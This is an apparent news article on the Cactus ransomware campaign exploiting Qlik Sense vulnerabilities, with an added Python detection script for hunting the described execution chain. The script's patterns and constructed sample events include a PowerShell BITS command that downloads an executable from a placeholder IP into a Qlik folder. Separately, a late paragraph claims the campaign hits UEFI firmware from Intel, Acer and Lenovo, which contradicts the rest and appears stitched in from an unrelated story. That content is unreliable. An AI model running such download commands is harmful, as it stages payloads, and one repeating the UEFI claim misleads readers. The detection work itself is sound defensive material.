Cactus Ransomware Campaign Exploits Qlik Sense Vulnerabilities

In the ever-evolving landscape of cybersecurity threats, a new and concerning campaign has emerged, known as the Cactus Ransomware Campaign. This campaign, as observed and analyzed by Arctic Wolf Labs, marks a novel method of attack: the exploitation of vulnerabilities in the Qlik Sense application, a cloud analytics and business intelligence platform.

The Cactus Ransomware Campaign targets publicly exposed installations of Qlik Sense. Researchers at Arctic Wolf Labs, in conjunction with evidence from Praetorian, have identified multiple vulnerabilities (CVE-2023-41266, CVE-2023-41265, and CVE-2023-48365) being exploited by the attackers. This campaign signifies the first documented instance where Cactus ransomware has been deployed through the exploitation of Qlik Sense.

Upon exploiting the Qlik Sense installations, the attackers followed a consistent execution chain across all identified intrusions. The process typically involved using the Qlik Sense Scheduler service to spawn uncommon processes. This method of attack was complemented by leveraging PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools. These tools included renamed ManageEngine UEMS executables, AnyDesk for remote access, and a Plink (PuTTY Link) binary for establishing secure connections.

In a sophisticated move, the threat actors cleverly masqueraded the malicious files as legitimate Qlik components. This method of disguising the ransomware made detection significantly more challenging. The attackers also utilized renamed executable files, which were silently installed without alerting the users or security systems.
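The execution chain described in the two paragraphs above (Qlik Sense Scheduler spawning interpreters, PowerShell or BITS fetching tools, and legitimate utilities renamed to look like Qlik components) can be hunted for in ordinary process-creation telemetry. The script below is an added example written for this page, not code from Arctic Wolf Labs or Qlik; it runs three detection rules over constructed Sysmon Event ID 1 style records. The Scheduler service path, the list of tool names, the file names and the IP address in the sample events are all assumptions or constructed values, so substitute the paths and names from your own inventory before using it.

```python
"""Hunt for the Qlik Sense -> PowerShell/BITS -> renamed-tool chain in
process-creation telemetry (Sysmon Event ID 1 style records).
Added example; the paths and tool names below are assumptions."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str               # full path of the created process
    parent_image: str        # full path of the parent process
    command_line: str        # command line of the created process
    original_file_name: str  # PE version-info name, as Sysmon reports it


# Assumption: the Qlik Sense Scheduler service binary lives at this path.
QLIK_SCHEDULER = re.compile(r"\\qlik\\sense\\scheduler\\scheduler\.exe$", re.IGNORECASE)

# Interpreters and transfer utilities that the Scheduler service has no
# business launching during normal operation.
UNCOMMON_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "bitsadmin.exe",
                     "certutil.exe", "rundll32.exe"}

# Command-line fragments that indicate a download via PowerShell or BITS.
DOWNLOAD_PATTERNS = (
    re.compile(r"Start-BitsTransfer", re.IGNORECASE),
    re.compile(r"bitsadmin(\.exe)?\s+/transfer", re.IGNORECASE),
    re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString", re.IGNORECASE),
)

# Assumed original (version-info) names of the tools named in the report.
KNOWN_TOOLS = {"anydesk": "AnyDesk", "plink": "Plink (PuTTY Link)"}


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _stem(path: str) -> str:
    return ntpath.splitext(_base(path))[0]


def scheduler_spawn(ev: ProcEvent):
    """Rule 1: the Qlik Scheduler service spawned an interpreter or downloader."""
    if QLIK_SCHEDULER.search(ev.parent_image) and _base(ev.image) in UNCOMMON_CHILDREN:
        return f"Qlik Scheduler spawned {_base(ev.image)}"
    return None


def download_activity(ev: ProcEvent):
    """Rule 2: the command line pulls a file down with PowerShell or BITS."""
    for pat in DOWNLOAD_PATTERNS:
        if pat.search(ev.command_line):
            return f"download primitive in command line: {pat.pattern}"
    return None


def renamed_tool(ev: ProcEvent):
    """Rule 3: a known remote-access/tunnelling tool runs under a different
    on-disk name (renamed executable), optionally parked in a Qlik directory."""
    tool = KNOWN_TOOLS.get(_stem(ev.original_file_name))
    if tool and _stem(ev.image) != _stem(ev.original_file_name):
        where = " placed under a Qlik path" if "\\qlik\\" in ev.image.lower() else ""
        return f"{tool} running as {_base(ev.image)}{where}"
    return None


RULES = {"scheduler_spawn": scheduler_spawn,
         "download": download_activity,
         "renamed_tool": renamed_tool}


def analyze(events):
    """Return (event index, rule name, detail) for every rule that fires."""
    findings = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            detail = rule(ev)
            if detail:
                findings.append((i, name, detail))
    return findings


# Constructed sample telemetry: one benign event, the chain, and a legitimate AnyDesk.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe",
              "notepad.exe notes.txt", "NOTEPAD.EXE"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
              r"powershell.exe -c Start-BitsTransfer -Source http://198.51.100.10/u.exe "
              r"-Destination C:\ProgramData\Qlik\qlik-sense-update.exe", "PowerShell.EXE"),
    ProcEvent(r"C:\ProgramData\Qlik\qlik-sense-update.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\ProgramData\Qlik\qlik-sense-update.exe --silent", "AnyDesk.exe"),
    ProcEvent(r"C:\Program Files\AnyDesk\AnyDesk.exe", r"C:\Windows\explorer.exe",
              r"C:\Program Files\AnyDesk\AnyDesk.exe", "AnyDesk.exe"),
]

if __name__ == "__main__":
    for idx, rule_name, detail in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: [{rule_name}] {detail}")
```

The third rule is what catches the masquerading: a renamed binary keeps the original name in its PE version information, so comparing Sysmon's OriginalFileName with the on-disk name flags it regardless of how Qlik-like the new name looks. Rules 1 and 2 are independent of that, so they still fire if the actor switches to a tool that is not in the list.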

The culmination of these steps led to the deployment of the Cactus ransomware. This particular ransomware variant is known for its stealth and persistence, maintaining a low profile to avoid detection and, consequently, prolonging its presence within the compromised systems.

The Cactus Ransomware Campaign is not limited to specific vendors or devices, affecting a wide range of manufacturers and impacting both consumer and enterprise UEFI firmware. The scale of the vulnerability exposure is vast, with potential implications for hundreds of devices from prominent manufacturers like Intel, Acer, and Lenovo.

As the investigation by Arctic Wolf Labs continues, it brings to light the critical need for vigilance and proactive measures in cybersecurity. Regularly updating security patches and training personnel to recognize and respond to threats are essential steps in guarding against such sophisticated attacks.

The Cactus Ransomware Campaign is a stark reminder of the ingenuity and persistence of cybercriminals. It underscores the need for comprehensive security strategies that go beyond conventional defenses to protect against the dynamic and evolving nature of cyber threats.